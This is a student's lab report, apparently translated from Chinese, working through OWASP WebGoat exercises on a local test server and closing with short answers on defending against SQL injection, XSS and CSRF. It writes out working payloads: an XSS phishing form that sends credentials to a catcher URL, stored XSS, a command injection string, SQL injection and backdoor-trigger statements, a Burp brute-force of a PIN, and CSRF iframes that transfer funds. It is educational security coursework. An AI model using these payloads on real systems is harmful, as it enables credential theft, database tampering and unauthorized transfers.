20155229 "Network countermeasure Technology" Exp9:web Security Foundation

Experimental content

• Webgoat the experiment in practice.

Experimental steps

WebGoat: Webgoat is a web-based vulnerability experiment developed by the OWASP organization, which contains a variety of vulnerabilities commonly found in the web, such as cross-site scripting attacks, SQL injection, access control, hidden fields, cookies, etc.

• Enter java -jar webgoat-container-7.0.1-war-exec.jar command to open webgoat

• Access to the Webgoat on the browser.
• Addresslocalhost:8080/WebGoat

Cross-site Scripting (XSS) Phishing with XSS (phishing attack)

• searchfill in a section of a page for fishing

</form><script>    function hack(){         XSSImage=new Image;        XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";        alert(".....your information was stolen by lsq! User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);    } </script><form name="phish"><br><br><HR>    <H2>please input your information here:</H2><br>    <br>Enter Username:<br>    <input type="text" name="user">    <br>Enter Password:<br>    <input type="password" name = "pass"><br>    <input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>

After clicking Search

Enter your user name and password at random

After landing, you will find that the page fill information has been captured and feedback back to show on the page.

Stored XSS Attacks

• XSS attack code is stored in the database, every time when the user opens this page will be executed, harmful, often words message board, every time when the user view message information is triggered. Causes an unexpected page or content to be loaded when the user accesses it.

• Enter in the title freely

• In message, enter<script>alert(" you have been attacked by tvxq !!");</script>

• submitafter clicking Create post:

• Click on the connection above and the attack succeeds.

Reflected XSS Attacks (reflection type XSS)

• Non-persistent, you need to deceive users to click on the link to trigger the XSS code (the server does not have such a page and content), generally easy to appear in the search page.
• XSS occurs when unauthenticated user input is used in an HTTP response. In a reflection XSS attack, an attacker could use an attack script to create a URL and then submit it to another website, send an email, or have the victim click.

Injection Flawscommand Injection

• Command injection attacks are a serious threat to any one parameter-driven site. The technology behind this attack technology is simple and easy to learn, which can cause widespread damage and endanger the security of the system. Despite the incredible number of such risks, systems in the Internet are vulnerable to this form of attack.

• Start WebScarab. Select a page from the drop-down list in the course page, then click "View"

• Add at the requested page "&netstat -an & ipconfig" . Then click View to see it.

• View the usage and IP address of the network port.

Numeric SQL injection (digital SQL injection)

• By injecting feature characters into the station field, the group can synthesize new SQL statements.

• SELECT * FROM weather_data WHERE station=[station]

• The following form allows users to view weather data. View all weather data by injecting a SQL string

• Choose a city, click "GO"
  

• Add "or 1=1" after the number to determine

• Once you've added and clicked go, you'll be able to see weather data for all cities.

Logging Spoofing (log Spoofing)

• Such attacks fool people's eyes in log files, and attackers can use this method to clear their traces in the log.

• In username input fyh%0d%0aLogin Succeeded for username: admin , where%0d is a carriage return,%0a is a newline character.

• , the attack was successful.

String SQL Injectionlab:sql Injection (SQL injection) stage1:string SQL injection

• Bypass authentication with SQL injection.

• Log in as user Neville, enter SQL injection in the password field ‘ or 1=1 -- , but login fails.

• Using inspect element to view the source of the Web page, the input box is found to limit the length of the input, the maximum allowed to enter only 8 characters, change 8 to 40

You can log on successfully.

Stage3:numeric SQL Injection

• The goal of this course is to use the injected statement to navigate to information that could not otherwise be browsed. Browse the boss's account information from an ordinary employee's account.

• Click Viewprofile to view employee information

• Change the value of the employee information to101 or 1=1 order by salary desc --
• This way, the boss's message will be ranked first according to the rank of the salary.

Database backdoors (data back door)

• Enter 101 to get the user's information:

• The input statement is not validated and SQL injection is easy. To execute two statements, you need to separate the middle with a semicolon. Enter the injection statement 101;update employee set salary=90000 .

• Use the following query criteria to add a trigger:

101;CREATE TRIGGER lsqBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=‘[email protected]‘ WHERE userid = NEW.userid

Blind Numeric SQL Injection (digital blind injection)

• The goal is to find the numeric value of the Pin field in the record in the pins table with a value of cc_number field of 1111222233334444. The Pin field type is int, integer.

101 AND ((SELECT pin FROM pins WHERE cc_number=‘1111222233334444‘) > 10000 );

• See if the pin value is greater than 10000

• Always try 5000, 2500, to 1250 the discovery hint becomes账户有效

Then try 2000, 2250, etc.

Open Burpsuite, set proxy the agent'soptions

Change the port number to 5229 and click Add,ok

• Set the browser's proxy, open "more" on the right side of the browser, click Preference->advanced->natwork->settings, select the agent shown, and the port number for the port number you just set.

When Burpsuite is treated as an intermediary server, each packet flows through it. Return to the topic, click Go, return to Burpsuite, have already grasped the package.

In positions, select Sniper mode, in payloads, select type number, then set change range 2250-2500, and set the step to 1, in the options, select Start Attack to start the attack.

The value of the packet size change was found to be 2364

Bring 2364 in the webgoat, right.

Csrfcross Site Request Forgery (CSRF)

• You can build a link by locating the screen and menu values in the parameters that are inserted on the right. Recipients of CSRF Mail that were certified at that time will transfer their funds. When the attack on this lesson succeeds, a green check mark appears next to the menu on the left.

• In message, enter

• The value of screen and the value of menu are obtained by. Then set the width to 1 pixels and hide the image.

• After submission, you will see a new message in the message list and click

• The following message will be loaded to achieve the purpose of the CSRF attack.

CSRF Prompt By-Pass

• In Title input: 5229
• In message input:

<iframe    src="attack?Screen=273&menu=900&transferFunds=5000"    id="myFrame" frameborder="1" marginwidth="0"    marginheight="0" width="800" scrolling=yes height="300"    onload="document.getElementById(‘frame2‘).src=‘attack?Screen=280&menu=900&transferFunds=CONFIRM‘;"></iframe> <iframe    id="frame2" frameborder="1" marginwidth="0"    marginheight="0" width="800" scrolling=yes height="300"></iframe>

• The following results are obtained:

Answers to questions after the experiment

(1) SQL injection attack principle, how to defend
Principle:

利用现有应用程序，将恶意的SQL命令注入到后台数据库引擎执行的能力。通过在Web表单中输入恶意SQL语句得到一个存在安全漏洞的网站上的数据库，最终达到欺骗服务器执行恶意的SQL命令。

Defense:

以SQL注入为例,可以通过JAVA中的绑定变量等方法进行预防,JAVA的绑定变量方法是吧用户的输入作为一种变量,对SQL语句进行预编译,这样在执行时就不是顺序执行,而是把输入作为一种变量进行处理,不会在运行时进行动态的拼接SQL语句,防止了恶意的攻击代码被写入SQL语句进行解析和执行。

(2) The principle of XSS attack, how to defend

Principle:

XSS攻击是Web攻击中最常见的攻击方法之一，它是通过对网页注入可执行代码且成功地被浏览器执行，达到攻击的目的，形成了一次有效XSS攻击，一旦攻击成功，它可以获取用户的联系人列表，然后向联系人发送虚假诈骗信息，可以删除用户的日志等等。

Defense:

- 在表单提交或者url参数传递前，对需要的参数进行过滤。- 过滤用户输入的检查用户输入的内容中是否有非法内容。如<>（尖括号）、”（引号）、 ‘（单引号）、%（百分比符号）、;（分号）、()（括号）、&（& 符号）、+（加号）等。严格控制输出

(3) CSRF attack principle, how to defend

Principle:

CSRF就是冒名登录。跨站请求伪造的核心本质是窃取用户的Session,或者说Cookie,因为目前主流情况Session都是存在Cookie中.攻击者并不关心被害者具体帐号和密码,因为一旦用户进行了登录,Session就是用户的唯一凭证,只要攻击者能够得到Session,就可以伪装成被害者进入服务器.

Defense:

- 验证HTTP Referer字段。- 在请求地址中添加token并验证。- 在HTTP头中自定义属性并验证。

Experiment Summary and experience

• This experiment was based on a previous experiment to understand SQL and XSS attacks more deeply, although the method of attack is many, but is a very interesting attack method, have the opportunity to try again did not do the topic.

20155229 "Network countermeasure Technology" Exp9:web Security Foundation